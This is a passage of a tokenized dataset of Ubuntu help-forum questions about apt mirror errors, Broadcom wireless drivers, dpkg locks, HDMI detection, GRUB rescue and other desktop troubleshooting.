http ' ( -5 - no address associated with hostname ) err http : //us.old-releases.ubuntu.com precise/universe translation-en_us something wicked happened resolving 'us.old-releases.ubuntu.com : http ' ( -5 - no address associated with hostname ) err http : //us.old-releases.ubuntu.com precise/universe translation-en something wicked happened resolving 'us.old-releases.ubuntu.com : http ' ( -5 - no address associated with hostname ) err http : //us.old-releases.ubuntu.com precise-updates/main sources something wicked happened resolving 'us.old-releases.ubuntu.com : http ' ( -5 - no address associated with hostname ) err http : //us.old-releases.ubuntu.com precise-updates/main i386 packages something wicked happened resolving 'us.old-releases.ubuntu.com : http ' ( -5 - no address associated with hostname ) err http : //us.old-releases.ubuntu.com precise-updates/main translation-en_us something wicked happened resolving 'us.old-releases.ubuntu.com : http ' ( -5 - no address associated with hostname ) err http : //us.old-releases.ubuntu.com precise-updates/main translation-en something wicked happened resolving 'us.old-releases.ubuntu.com : http ' ( -5 - no address associated with hostname ) err http : //us.old-releases.ubuntu.com karmic-backports/main sources something wicked happened resolving 'us.old-releases.ubuntu.com : http ' ( -5 - no address associated with hostname ) err http : //us.old-releases.ubuntu.com karmic-backports/restricted sources something wicked happened resolving 'us.old-releases.ubuntu.com : http ' ( -5 - no address associated with hostname ) err http : //us.old-releases.ubuntu.com karmic-backports/universe sources something wicked happened resolving 'us.old-releases.ubuntu.com : http ' ( -5 - no address associated with hostname ) ign http : //archive.canonical.com quantal inrelease err http : //us.old-releases.ubuntu.com karmic-backports/multiverse sources something wicked happened resolving 'us.old-releases.ubuntu.com : http ' ( -5 - no address associated with hostname ) err http : //us.old-releases.ubuntu.com karmic-backports/main i386 packages something wicked happened resolving 'us.old-releases.ubuntu.com : http ' ( -5 - no address associated with hostname ) err http : //us.old-releases.ubuntu.com karmic-backports/restricted i386 packages something wicked happened resolving 'us.old-releases.ubuntu.com : http ' ( -5 - no address associated with hostname ) err http : //us.old-releases.ubuntu.com karmic-backports/universe i386 packages something wicked happened resolving 'us.old-releases.ubuntu.com : http ' ( -5 - no address associated with hostname ) err http : //us.old-releases.ubuntu.com karmic-backports/multiverse i386 packages something wicked happened resolving 'us.old-releases.ubuntu.com : http ' ( -5 - no address associated with hostname ) err http : //us.old-releases.ubuntu.com karmic-backports/main translation-en_us something wicked happened resolving 'us.old-releases.ubuntu.com : http ' ( -5 - no address associated with hostname ) err http : //us.old-releases.ubuntu.com karmic-backports/main translation-en something wicked happened resolving 'us.old-releases.ubuntu.com : http ' ( -5 - no address associated with hostname ) err http : //us.old-releases.ubuntu.com karmic-backports/multiverse translation-en_us something wicked happened resolving 'us.old-releases.ubuntu.com : http ' ( -5 - no address associated with hostname ) err http : //us.old-releases.ubuntu.com karmic-backports/multiverse translation-en something wicked happened resolving 'us.old-releases.ubuntu.com : http ' ( -5 - no address associated with hostname ) err http : //us.old-releases.ubuntu.com karmic-backports/restricted translation-en_us something wicked happened resolving 'us.old-releases.ubuntu.com : http ' ( -5 - no address associated with hostname ) err http : //us.old-releases.ubuntu.com karmic-backports/restricted translation-en something wicked happened resolving 'us.old-releases.ubuntu.com : http ' ( -5 - no address associated with hostname ) err http : //us.old-releases.ubuntu.com karmic-backports/universe translation-en_us something wicked happened resolving 'us.old-releases.ubuntu.com : http ' ( -5 - no address associated with hostname ) err http : //us.old-releases.ubuntu.com karmic-backports/universe translation-en something wicked happened resolving 'us.old-releases.ubuntu.com : http ' ( -5 - no address associated with hostname ) hit http : //security.ubuntu.com precise-security/main sources hit http : //archive.canonical.com karmic release.gpg hit http : //security.ubuntu.com precise-security/restricted sources hit http : //archive.canonical.com precise release.gpg hit http : //security.ubuntu.com precise-security/universe sources hit http : //archive.canonical.com quantal release.gpg ign http : //dl.google.com stable/main translation-en_us hit http : //security.ubuntu.com precise-security/multiverse sources hit http : //archive.canonical.com karmic release ign http : //dl.google.com stable/main translation-en hit http : //security.ubuntu.com precise-security/main i386 packages hit http : //archive.canonical.com precise release hit http : //security.ubuntu.com precise-security/restricted i386 packages hit http : //archive.canonical.com quantal release hit http : //security.ubuntu.com precise-security/universe i386 packages hit http : //archive.canonical.com karmic/partner i386 packages hit http : //security.ubuntu.com precise-security/multiverse i386 packages hit http : //security.ubuntu.com precise-security/main translation-en hit http : //archive.canonical.com precise/partner sources hit http : //archive.canonical.com quantal/partner i386 packages hit http : //security.ubuntu.com precise-security/multiverse translation-en hit http : //security.ubuntu.com precise-security/restricted translation-en hit http : //security.ubuntu.com precise-security/universe translation-en ign http : //archive.canonical.com karmic/partner translation-en_us ign http : //archive.canonical.com karmic/partner translation-en ign http : //archive.canonical.com quantal/partner translation-en_us ign http : //security.ubuntu.com precise-security/main translation-en_us ign http : //archive.canonical.com quantal/partner translation-en ign http : //security.ubuntu.com precise-security/multiverse translation-en_us ign http : //security.ubuntu.com precise-security/restricted translation-en_us ign http : //security.ubuntu.com precise-security/universe translation-en_us w : failed to fetch http : //us.old-releases.ubuntu.com/ubuntu/dists/precise/release.gpg something wicked happened resolving 'us.old-releases.ubuntu.com : http ' ( -5 - no address associated with hostname ) w : failed to fetch http : //us.old-releases.ubuntu.com/ubuntu/dists/precise-updates/release.gpg something wicked happened resolving 'us.old-releases.ubuntu.com : http ' ( -5 - no address associated with hostname ) w : failed to fetch http : //us.old-releases.ubuntu.com/ubuntu/dists/karmic-backports/release.gpg something wicked happened resolving 'us.old-releases.ubuntu.com : http ' ( -5 - no address associated with hostname ) w : failed to fetch http : //us.old-releases.ubuntu.com/ubuntu/dists/precise/main/source/sources something wicked happened resolving 'us.old-releases.ubuntu.com : http ' ( -5 - no address associated with hostname ) w : failed to fetch http : //us.old-releases.ubuntu.com/ubuntu/dists/precise/restricted/source/sources something wicked happened resolving 'us.old-releases.ubuntu.com : http ' ( -5 - no address associated with hostname ) w : failed to fetch http : //us.old-releases.ubuntu.com/ubuntu/dists/precise/universe/source/sources something wicked happened resolving 'us.old-releases.ubuntu.com : http ' ( -5 - no address associated with hostname ) w : failed to fetch http : //us.old-releases.ubuntu.com/ubuntu/dists/precise/multiverse/source/sources something wicked happened resolving 'us.old-releases.ubuntu.com : http ' ( -5 - no address associated with hostname ) w : failed to fetch http : //us.old-releases.ubuntu.com/ubuntu/dists/precise/main/binary-i386/packages something wicked happened resolving 'us.old-releases.ubuntu.com : http ' ( -5 - no address associated with hostname ) w : failed to fetch http : //us.old-releases.ubuntu.com/ubuntu/dists/precise/restricted/binary-i386/packages something wicked happened resolving 'us.old-releases.ubuntu.com : http ' ( -5 - no address associated with hostname ) w : failed to fetch http : //us.old-releases.ubuntu.com/ubuntu/dists/precise/universe/binary-i386/packages something wicked happened resolving 'us.old-releases.ubuntu.com : http ' ( -5 - no address associated with hostname ) w : failed to fetch http : //us.old-releases.ubuntu.com/ubuntu/dists/precise/multiverse/binary-i386/packages something wicked happened resolving 'us.old-releases.ubuntu.com : http ' ( -5 - no address associated with hostname ) w : failed to fetch http : //us.old-releases.ubuntu.com/ubuntu/dists/precise/main/i18n/translation-en_us something wicked happened resolving 'us.old-releases.ubuntu.com : http ' ( -5 - no address associated with hostname ) w : failed to fetch http : //us.old-releases.ubuntu.com/ubuntu/dists/precise/main/i18n/translation-en something wicked happened resolving 'us.old-releases.ubuntu.com : http ' ( -5 - no address associated with hostname ) w : failed to fetch http : //us.old-releases.ubuntu.com/ubuntu/dists/precise/multiverse/i18n/translation-en_us something wicked happened resolving 'us.old-releases.ubuntu.com : http ' ( -5 - no address associated with hostname ) w : failed to fetch http : //us.old-releases.ubuntu.com/ubuntu/dists/precise/multiverse/i18n/translation-en something wicked happened resolving 'us.old-releases.ubuntu.com : http ' ( -5 - no address associated with hostname ) w : failed to fetch http : //us.old-releases.ubuntu.com/ubuntu/dists/precise/restricted/i18n/translation-en_us something wicked happened resolving 'us.old-releases.ubuntu.com : http ' ( -5 - no address associated with hostname ) w : failed to fetch http : //us.old-releases.ubuntu.com/ubuntu/dists/precise/restricted/i18n/translation-en something wicked happened resolving 'us.old-releases.ubuntu.com : http ' ( -5 - no address associated with hostname ) w : failed to fetch http : //us.old-releases.ubuntu.com/ubuntu/dists/precise/universe/i18n/translation-en_us something wicked happened resolving 'us.old-releases.ubuntu.com : http ' ( -5 - no address associated with hostname ) w : failed to fetch http : //us.old-releases.ubuntu.com/ubuntu/dists/precise/universe/i18n/translation-en something wicked happened resolving 'us.old-releases.ubuntu.com : http ' ( -5 - no address associated with hostname ) w : failed to fetch http : //us.old-releases.ubuntu.com/ubuntu/dists/precise-updates/main/source/sources something wicked happened resolving 'us.old-releases.ubuntu.com : http ' ( -5 - no address associated with hostname ) w : failed to fetch http : //us.old-releases.ubuntu.com/ubuntu/dists/precise-updates/main/binary-i386/packages something wicked happened resolving 'us.old-releases.ubuntu.com : http ' ( -5 - no address associated with hostname ) w : failed to fetch http : //us.old-releases.ubuntu.com/ubuntu/dists/precise-updates/main/i18n/translation-en_us something wicked happened resolving 'us.old-releases.ubuntu.com : http ' ( -5 - no address associated with hostname ) w : failed to fetch http : //us.old-releases.ubuntu.com/ubuntu/dists/precise-updates/main/i18n/translation-en something wicked happened resolving 'us.old-releases.ubuntu.com : http ' ( -5 - no address associated with hostname ) w : failed to fetch http : //us.old-releases.ubuntu.com/ubuntu/dists/karmic-backports/main/source/sources something wicked happened resolving 'us.old-releases.ubuntu.com : http ' ( -5 - no address associated with hostname ) w : failed to fetch http : //us.old-releases.ubuntu.com/ubuntu/dists/karmic-backports/restricted/source/sources something wicked happened resolving 'us.old-releases.ubuntu.com : http ' ( -5 - no address associated with hostname ) w : failed to fetch http : //us.old-releases.ubuntu.com/ubuntu/dists/karmic-backports/universe/source/sources something wicked happened resolving 'us.old-releases.ubuntu.com : http ' ( -5 - no address associated with hostname ) w : failed to fetch http : //us.old-releases.ubuntu.com/ubuntu/dists/karmic-backports/multiverse/source/sources something wicked happened resolving 'us.old-releases.ubuntu.com : http ' ( -5 - no address associated with hostname ) w : failed to fetch http : //us.old-releases.ubuntu.com/ubuntu/dists/karmic-backports/main/binary-i386/packages something wicked happened resolving 'us.old-releases.ubuntu.com : http ' ( -5 - no address associated with hostname ) w : failed to fetch http : //us.old-releases.ubuntu.com/ubuntu/dists/karmic-backports/restricted/binary-i386/packages something wicked happened resolving 'us.old-releases.ubuntu.com : http ' ( -5 - no address associated with hostname ) w : failed to fetch http : //us.old-releases.ubuntu.com/ubuntu/dists/karmic-backports/universe/binary-i386/packages something wicked happened resolving 'us.old-releases.ubuntu.com : http ' ( -5 - no address associated with hostname ) w : failed to fetch http : //us.old-releases.ubuntu.com/ubuntu/dists/karmic-backports/multiverse/binary-i386/packages something wicked happened resolving 'us.old-releases.ubuntu.com : http ' ( -5 - no address associated with hostname ) w : failed to fetch http : //us.old-releases.ubuntu.com/ubuntu/dists/karmic-backports/main/i18n/translation-en_us something wicked happened resolving 'us.old-releases.ubuntu.com : http ' ( -5 - no address associated with hostname ) w : failed to fetch http : //us.old-releases.ubuntu.com/ubuntu/dists/karmic-backports/main/i18n/translation-en something wicked happened resolving 'us.old-releases.ubuntu.com : http ' ( -5 - no address associated with hostname ) w : failed to fetch http : //us.old-releases.ubuntu.com/ubuntu/dists/karmic-backports/multiverse/i18n/translation-en_us something wicked happened resolving 'us.old-releases.ubuntu.com : http ' ( -5 - no address associated with hostname ) w : failed to fetch http : //us.old-releases.ubuntu.com/ubuntu/dists/karmic-backports/multiverse/i18n/translation-en something wicked happened resolving 'us.old-releases.ubuntu.com : http ' ( -5 - no address associated with hostname ) w : failed to fetch http : //us.old-releases.ubuntu.com/ubuntu/dists/karmic-backports/restricted/i18n/translation-en_us something wicked happened resolving 'us.old-releases.ubuntu.com : http ' ( -5 - no address associated with hostname ) w : failed to fetch http : //us.old-releases.ubuntu.com/ubuntu/dists/karmic-backports/restricted/i18n/translation-en something wicked happened resolving 'us.old-releases.ubuntu.com : http ' ( -5 - no address associated with hostname ) w : failed to fetch http : //us.old-releases.ubuntu.com/ubuntu/dists/karmic-backports/universe/i18n/translation-en_us something wicked happened resolving 'us.old-releases.ubuntu.com : http ' ( -5 - no address associated with hostname ) w : failed to fetch http : //us.old-releases.ubuntu.com/ubuntu/dists/karmic-backports/universe/i18n/translation-en something wicked happened resolving 'us.old-releases.ubuntu.com : http ' ( -5 - no address associated with hostname ) e : some index files failed to download . they have been ignored , or old ones used instead . any suggestions
345420	wubi error executing command	wubi gives me error executing command : command=c : \windows\system32\bcdedit.exe /set { 79d57369-10fa-11e2-a539-af7634f5111e } device partition=f : retval=1 stderr=an error has occurred setting the element data .
345423	create roaming profile in windows 2008 server for ubuntu 12.04 client	i ve a windows 2008 domain controller , and i have created roaming profile that is working > > fine in windows environment.. now i have joined ubuntu 12.04 as a client to use likewise-open , but that roaming > > > > profile > is not working for ubuntu pc . how can i use roaming profile in ubuntu pc as a client ? ? ? ? ? ? ? ? ? ? can anyone help me ? ? ?
345429	unable to lock administration directory ( /var/lib/dpkg/ )	how to fix the error e : could not get lock /var/lib/dpkg/lock â open ( 11 : resource temporarily unavailable ) e : unable to lock the administration directory ( /var/lib/dpkg/ ) , is another process using it ?
345431	wireless disconnected , help me to get working wireless connection	my laptop ( compaq presario cq45 207tu ) can not connect to wireless networks , during startup it shows following errors b43-open/ucode15.fw not found b43/ucode15.fw not found please help me to get working wifi on ubuntu , ( i am using wifi connection on windows 7 on same laptop )
345434	change root file-system type ( lvm )	i have an ubuntu 13.04 server configured in this way : % df -tph filesystem type size used avail use % mounted on /dev/mapper/yankee-root xfs 20g 5.0g 15g 26 % / none tmpfs 4.0k 0 4.0k 0 % /sys/fs/cgroup udev devtmpfs 114m 4.0k 114m 1 % /dev tmpfs tmpfs 25m 336k 24m 2 % /run none tmpfs 5.0m 0 5.0m 0 % /run/lock none tmpfs 122m 60k 122m 1 % /run/shm none tmpfs 100m 0 100m 0 % /run/user /dev/sda1 ext4 232m 82m 138m 38 % /boot i am using lvm and i can add as many hard drives as i want . i would like to change the file-system type for / to xfs to ext4 . what are the steps that i should take ? thanks
345435	ca n't get the wireless adapter to work , any workarounds ?	i have a currently unsupported wireless usb adapter tl-wn8200nd , and i can not get it to work on ubuntu . i was wondering whether it was possible to get it to work using an older versions driver with some modifications or some other methodology in general ? edit : it is a tp-link product with no driver support for a linux environment
345444	high cpu usage even when no application is running ( desktop )	i always have high cpu usage in ubuntu in every version of it that i have used . i have been using ubuntu from 10.04 version . my cpu usage even at idle is more than 30 % for each core ( unlike windows 7 uses only 5 % ) due to which i 'm getting my processor under very high temperature . even my friends too experienced the same problem . this is not solved even now in 13.04 . i 'm not telling this just by installing ubuntu in only my system , but i have tested it with single core and multi core processors with and without graphics cards , everything type of configuration gave me the same results . someone please help me how to solve this problem , as i 'm experiencing this for years . currently my system configuration is , amd phenom x6 1100t processor amd radeon hd 6770 gddr5 graphics 4gb ram 1tb hdd
345447	when i run some of the programs , my system will logout	i have downloaded a package that was installed and it showed dependency error and i installed dependency . i had to finally give the following command : sudo apt-get autoremove after this , when i run some of the programs will be logout locate system programs such as : qt goldendict
345454	problem installing the graphics driver on hp 4441s	i am using ubuntu 12.04 on my hp proobook 4441s . i 've downloaded the graphics driver from hp 's site but it 's in rpm format . i tried converting it using using alien but it does n't allow it to convert . i really need to install the driver as the laptop is heating up too much , the proprietary ati driver is no good in power saving .
345463	facebook messenger notification sound does n't work	lately i 've installed fbmessenger in ubuntu 13.04 following these instructions the app worked fine : i could receive instant messages , see when someone commented my posts and so on , except notification sounds for new messages . they just do n't work even though i checked the option `` chat sounds '' : see screenshot help me , please , to figure out how to enable these sounds .
345467	asus saubertooth z87 [ uefi bios ] -- pxe support	i 've bought a new desktop with an asus saubertooth z87 motherboard . i have already a working pxe enviroment in my subnet and i would like to install ubuntu os ( 12.10 or 13.04 ) from it ( in dual boot with windows 7 ) . i 'm not able to prioritize the network boot from the uefi bios . i 've already enabled the uefi network stack and the pxe support ( both for ipv4 and ipv6 ) . furthermore i 've the fast boot enabled but i set to load in any case the network stack driver . even tought this configuration the uefi does n't allow me to set the network boot as first , therefore when i turn on the desktop , it simply starts my windows 7 . someone could address me in the right direction ? furthremore , the pxe enviroment in my subnet use the classical pxelinux.0 /pxelinux.cfg , is it fine also for uefi ? thank you in advance . alessio
345468	can not install broadcom sta wireless driver	i just installed ubuntu 12.0.4 and i can not get the driver for my broadcom bcm4311 wireless card installed . i have searched through the forums and tried many methods including using the ubuntu software center , running sudo apt-get -- reinstall install bcmwl-kernel-source , and downloading the driver directly and running make - but all of them have failed in a similar manner . i can post error logs from these and/or any other trials , but this is the one that i find the most telling ( from can not install broadcom 802.11 linux sta wireless driver ? ) : craig @ reaver : ~ $ sudo apt-get install -- reinstall bcmwl-kernel-source reading package lists ... done building dependency tree reading state information ... done the following new packages will be installed : bcmwl-kernel-source 0 upgraded , 1 newly installed , 0 to remove and 0 not upgraded . need to get 0 b/1,301 kb of archives . after this operation , 3,656 kb of additional disk space will be used . selecting previously unselected package bcmwl-kernel-source . ( reading database ... 195644 files and directories currently installed . ) unpacking bcmwl-kernel-source ( from ... /bcmwl-kernel-source_6.20.155.1+bdcom-0ubuntu0.0.1_i386.deb ) ... setting up bcmwl-kernel-source ( 6.20.155.1+bdcom-0ubuntu0.0.1 ) ... loading new bcmwl-6.20.155.1+bdcom dkms files ... first installation : checking all kernels ... building only for 3.8.0-30-generic building for architecture i686 building initial module for 3.8.0-30-generic error ! bad return status for module build on kernel : 3.8.0-30-generic ( i686 ) consult /var/lib/dkms/bcmwl/6.20.155.1+bdcom/build/make.log for more information . warning : all config files need .conf : /etc/modprobe.d/blacklist.conf.20130914 , it will be ignored in a future release . fatal : module wl not found . update-initramfs : deferring update ( trigger activated ) processing triggers for initramfs-tools ... update-initramfs : generating /boot/initrd.img-3.8.0-30-generic craig @ reaver : ~ $ sudo modprobe wl warning : all config files need .conf : /etc/modprobe.d/blacklist.conf.20130914 , it will be ignored in a future release . fatal : module wl not found . so it seems something is up with this module wl , but i ca n't figure out exactly what . update : as per rajagenupula 's request , here is the ouput of /var/lib/dkms/bcmwl/6.20.155.1+bdcom/build/make.log : dkms make.log for bcmwl-6.20.155.1+bdcom for kernel 3.8.0-30-generic ( i686 ) sat sep 14 09:44:57 edt 2013 make : entering directory `/usr/src/linux-headers-3.8.0-30-generic' cfg80211 api is prefered for this kernel version using cfg80211 api ld /var/lib/dkms/bcmwl/6.20.155.1+bdcom/build/built-in.o cc [ m ] /var/lib/dkms/bcmwl/6.20.155.1+bdcom/build/src/shared/linux_osl.o cc [ m ] /var/lib/dkms/bcmwl/6.20.155.1+bdcom/build/src/wl/sys/wl_linux.o cc [ m ] /var/lib/dkms/bcmwl/6.20.155.1+bdcom/build/src/wl/sys/wl_iw.o cc [ m ] /var/lib/dkms/bcmwl/6.20.155.1+bdcom/build/src/wl/sys/wl_cfg80211.o /var/lib/dkms/bcmwl/6.20.155.1+bdcom/build/src/wl/sys/wl_cfg80211.c : in function ‘wl_cfg80211_join_ibss’ : /var/lib/dkms/bcmwl/6.20.155.1+bdcom/build/src/wl/sys/wl_cfg80211.c:705:26 : error : ‘struct cfg80211_ibss_params’ has no member named ‘channel’ /var/lib/dkms/bcmwl/6.20.155.1+bdcom/build/src/wl/sys/wl_cfg80211.c : at top level : /var/lib/dkms/bcmwl/6.20.155.1+bdcom/build/src/wl/sys/wl_cfg80211.c:1560:2 : warning : initialization from incompatible pointer type [ enabled by default ] /var/lib/dkms/bcmwl/6.20.155.1+bdcom/build/src/wl/sys/wl_cfg80211.c:1560:2 : warning : ( near initialization for ‘wl_cfg80211_ops.scan’ ) [ enabled by default ] /var/lib/dkms/bcmwl/6.20.155.1+bdcom/build/src/wl/sys/wl_cfg80211.c:1565:2 : warning : initialization from incompatible pointer type [ enabled by default ] /var/lib/dkms/bcmwl/6.20.155.1+bdcom/build/src/wl/sys/wl_cfg80211.c:1565:2 : warning : ( near initialization for ‘wl_cfg80211_ops.set_tx_power’ ) [ enabled by default ] /var/lib/dkms/bcmwl/6.20.155.1+bdcom/build/src/wl/sys/wl_cfg80211.c:1566:2 : warning : initialization from incompatible pointer type [ enabled by default ] /var/lib/dkms/bcmwl/6.20.155.1+bdcom/build/src/wl/sys/wl_cfg80211.c:1566:2 : warning : ( near initialization for ‘wl_cfg80211_ops.get_tx_power’ ) [ enabled by default ] /var/lib/dkms/bcmwl/6.20.155.1+bdcom/build/src/wl/sys/wl_cfg80211.c : in function ‘wl_update_bss_info’ : /var/lib/dkms/bcmwl/6.20.155.1+bdcom/build/src/wl/sys/wl_cfg80211.c:1991:11 : error : ‘struct cfg80211_bss’ has no member named ‘information_elements’ /var/lib/dkms/bcmwl/6.20.155.1+bdcom/build/src/wl/sys/wl_cfg80211.c:1992:15 : error : ‘struct cfg80211_bss’ has no member named ‘len_information_elements’ make [ 1 ] : *** [ /var/lib/dkms/bcmwl/6.20.155.1+bdcom/build/src/wl/sys/wl_cfg80211.o ] error 1 make : *** [ _module_/var/lib/dkms/bcmwl/6.20.155.1+bdcom/build ] error 2 make : leaving directory `/usr/src/linux-headers-3.8.0-30-generic' update2 : in response to ubfan1 : craig @ reaver : ~ $ lspci -vvnn |grep 14e4 09:00.0 ethernet controller [ 0200 ] : broadcom corporation netxtreme bcm5755m gigabit ethernet pci express [ 14e4:1673 ] ( rev 02 ) 0c:00.0 network controller [ 0280 ] : broadcom corporation bcm4311 802.11a/b/g [ 14e4:4312 ] ( rev 01 ) i have run sudo apt-get install b43-fwcutter firmware-b43-lpphy-installer and both install just fine . but i am not sure what to do now . according to this : https : //help.ubuntu.com/community/wifidocs/driver/bcm43xx , the b43 driver ought to show up in my 'additional drivers ' but only the original 'broadcom sta wireless driver ' ( which does not install correctly ! ) is there . so what is the next step ?
345470	run program with group execution permission	i want to run program with execution permissions set to group . unfortunately bash says `` permission denided '' . how can i run program as user different that root without giving ownership to this user ? but relay on group permissions . is it possible ? more details : i 'm trying to run program as user 'user1 ' . this user belongs to group 'users ' . program permissions are : -rwxr-xr -- 1 root users 4121 jan 24 2013 /opt/apache-jmeter-2.9/bin/jmeter
345474	why does my laptop shut down unexpectedly ?	i keep running into the same issue every time i want to run linux on my laptop . it shuts down all of a sudden in the middle of a session without any warning , and i 'm not even able to turn it back on for half a minute or so . i tried different distros like ubuntu , mint , eos , fedora but it does n't make any difference . i have no such issues with windows . any idea how to resolve it ? or is it possible at all ? thanks a lot . my specs are : motherxtremetech.com/board : cpu type mobile amd v160 , 2359 mhz ( 12 x 197 ) motherboard name hewlett-packard hp 625 motherboard chipset amd m785 , amd k10 system memory 1785 mb dimm2 : ramaxel tech . rmt3020ef48e8w1333 2 gb ddr3-1333 ddr3 sdram ( 8-8-8-22 @ 609 mhz ) ( 7-7-7-20 @ 533 mhz ) ( 6-6-6-17 @ 457 mhz ) ( 5-5-5-14 @ 380 mhz ) bios type compaq ( 03/18/10 ) communication port standard serial over bluetooth link ( com4 ) display : video adapter ati mobility radeon hd 4200 series ( microsoft corporation- wddm v1.1 ) ( 256 mb ) video adapter ati mobility radeon hd 4200 series ( microsoft corporation- wddm v1.1 ) ( 256 mb ) 3d accelerator ati mobility radeon hd 4200 ( rs880m ) monitor generic pnp monitor [ nodb ]
345475	how can i enable keyboard backlight on sony vaio pro with ubuntu 13.10	how can i enable keyboard backlight on sony vaio pro with ubuntu 13.10 ? i have already tried setting the bit in /sys/devices/platform/sony-laptop/kbd_backlight with echo 1 | sudo tee /sys/devices/platform/sony-laptop/kbd_backlight and when saving the file i can see the bit has changed , but my keyboard still stays off . has anyone else had this problem , and found a way to fix this ?
345477	translating apps	firstly , i 've got to ( openly ) express what i think about this community , and the ubuntu project in general : it 's simply great ; ) good job ! i 'd therefore like to contribute the ubuntu community . i only know bits of programming and am starting now , but in the meanwhile i 'd also like to help translating stuff : i speak german , english and italian . so i looked a little bit , but could n't find much , except this : https : //wiki.ubuntu.com/ubuntudevelopment/internationalisation/translationprocess ..which did n't really help me any further : ) does anybody know anything 'bout this ? thanx to you all who take the time to read and the effort to answer !
345481	airplane mode on can not be turned off	ubuntu 12.04 has been working beautifully for over a month and connecting to the internet without a hitch . but suddenly i discovered that aeroplane mode has automatically turned on , and will not remain off . i have already tried some of the solutions suggested . for example , sudo rfkill all , but it did nothing . has anyone got any more suggestions ?
345485	ubuntu 13.04 does not detect hdmi	i have just upgraded my dell m1330 with intel gm965 graphics from 12.04 to 13.04 ( fresh install ) . now when i plug in an external monitor on hdmi , nothing happens . it seems that hdmi is only detected on boot and when i open screen settings , or run xrandr in a terminal . vga works , although a bit slow sometimes . i would report this as a bug , if i was n't so unsure what the actual reason for the problem actually is . can anyone please help me so my computer detects hdmi again ike on 12.04 ( where it worked flawlesly ) ?
345487	how do i adjust alsamixer ?	how i chage alsamixer in the command line so that i can fine tune alsamixer and get rid of some white noise ? right now it looks like this . but from what i have read i need it to look like this . thank you in advance for anyone who can help me .
345488	i want to put my logs on a seperate partition	i want to put my /var/logs on a separate partition . i know how to fstab , but one thing concerns me ... if i create the partition and mount it to /var/logs what would happen to the data already there ... and do i need to worry about the permissions of `` anything '' ? thank you in advance for your help .
345492	sharkoon adapter	i would try to connect a sata hard disk with the sharkoon drivelink combo usb 3.0 adapter , but it seems that ubuntu can not read the hard disk with this adapter . does anyone have experiences with this adapter or any advice on how to overcome this problem ?
345498	map ip address to virtual domain	i want to use chrome port forwarding feature and access my apache2 webserver here is a short of it : https : //plus.google.com/+googlechromedevelopers/posts/mvaqnzeopkt i can access 127.0.0.1 from my phone , but not example.dev virtual host . my guess is that it should be an ip address . so my idea was to forward my example.dev:80 to 127.0.0.1:8090 . so i would forward 127.0.0.1:8090 to my phone and access example.dev:80 is this possible ?
345500	new machine , no o/s , installed 12.04 , no wireless	i bought a used hp-compaq-6910p with no o/s , installed ubuntu 12.04 by booting from live-cd , all is well otherwise but no wireless . i have searched and wading through all the posts for the answer just tends to overload my circuits . would it be okay to start from scratch , not a total newbie but the next thing to being one ? other pc-specs are : 3.9gib memory , intel core 2 duo cpu t7100 @ 1.80ghz x 2 , 32 bit , 153.3 gb hard-drive . i have always been impressed by all you guru-techs and your willingness to help us newbies at no charge , the whole open-source thing , please advise ?
345504	12.04 - steam is running in the system monitor , but will not open	i am on ubuntu 12.04 , and have installed steam and had it running previously but for the past 2-3 days , whenever i try to run steam it opens a dialog box that says verifying installation and then it closes and nothing happens . when i try to run steam through terminal it gives me this : running steam on ubuntu 12.04 32-bit steam_runtime is enabled automatically installing breakpad exception handler for appid ( steam ) /version ( 1378500910_client ) installing breakpad exception handler for appid ( steam ) /version ( 1378500910_client ) installing breakpad exception handler for appid ( steam ) /version ( 1378500910_client ) unlinked 0 orphaned pipes removing stale semaphore last operated on by process 3130 with name 0eblobregistrymutex_f8ac220ef1cf9e5da3a138e83771d64c removing stale semaphore last operated on by process 3130 with name 0eblobregistrysignal_f8ac220ef1cf9e5da3a138e83771d64c removing stale semaphore last operated on by process 3130 with name 0emsteamengineinstance removing stale semaphore last operated on by process 3130 with name 0esteamenginelock installing breakpad exception handler for appid ( steam ) /version ( 1378500910_client ) [ 0914/114403 : warning : proxy_service.cc ( 958 ) ] pac support disabled because there is no system implementation any suggestions would be helpful . thanks !
345509	ca n't get broadcom 43142 drivers to work after installation on 5420 inspiron	i 'm a complete newbie to ubuntu , i 've already installed and reinstalled the broadcom driver required done a numerous amount of steps on terminal but i ca n't seem to get wireless working . however , my wired connection seems to work just fine . also i have tried to follow the instructions but get stuck at step number 2 when i get told `` no package dpkg is available '' : 1 ) download the file from the link 2 ) sudo yum install dpkg 3 ) mkdir bcm43142 4 ) dpkg-deb -x downloads/wireless-bcm43142-dkms-6.20.55.19_amd64.deb bcm43142 5 ) cd bcm43142/usr/src/wireless-bcm43142-oneiric-dkms-6.20.55.19~bdcom0602.0400.1000.0400/src/wl/sys 6 ) sudo yum install kernel-devel kernel-headers 7 ) vi wl_linux.c 8 ) around line 43 , remove the line include 9 ) save the file ( : wq ) 10 ) cd ../../.. 11 ) make things should work , and you 'll have a file called `` wl.ko '' in the current directory . 12 ) sudo yum remove broadcom-wl 13 ) sudo mkdir -p /lib/modules/3.5.2-3.fc17.x86_64/extra/wl 14 ) sudo cp wl.ko /lib/modules/3.5.2-3.fc17.x86_64/extra/wl 15 ) sudo depmod -a 16 ) sudo modprobe wl i really need help : /
345510	broadcom bcm4318 wireless lan controller issue	basically , i installed ubtunu from scratch the other day . it was working fine , the ethernet was easy . i just plugged it in and off it went . now today i did something stupid , thinking i could enable the wireless adaptor i went to additional drivers and saw that my internal broadcom bcm4318 wireless lan controller was not in use and like an idiot i put it into use and now i cant disable it . i tried to go to 'do not use this device ' but it will say that it is applying changes for a very good while . but the this weird black screen flickers on for a second and now instead of my using my ethernet , i know use my wireless adaptor which is broke and wont work with ubuntu . anyone got any idea on how to disable this device forever so i can go back to using my ethernet : /
345514	xbmcbuntu grub rescue	i rebooted my dedicated xbmc machine the other day and i got a ; [ code ] error : invalid arch-independent elf magic . grub rescue > [ /code ] i usually suspend and have done for about 4 months without a full reboot . i can boot into a desktop using a live usb , although only 12.04 server and xbmcbuntu 12.10 work , 12.04 , 12.10 and 13.04 live usb freeze and i 'm having to force a reboot even after an hour or so . this is the machine i 'm using ; linux 3.5.0-22-generic ubuntu 12.10 - xbmcbuntu quantal skin : aeon nox cpu : intel celeron g1610 2.60ghz gpu : enhanced intel hd graphics 2000/3000 ram : 2gb ssd : 32gb as i 'm only able to boot into a basic ubuntu desktop i do n't have a lot of tools other than the cli . [ code ] boot info script 0.61 [ 1 april 2012 ] ============================= boot info summary : =============================== = > grub2 ( v1.99 ) is installed in the mbr of /dev/sda and looks at sector 1 of the same hard drive for core.img . core.img is at this location and looks in partition 72 for . = > syslinux mbr ( 4.04 and higher ) is installed in the mbr of /dev/sdb . sda1 : __________________________________________________________________________ file system : 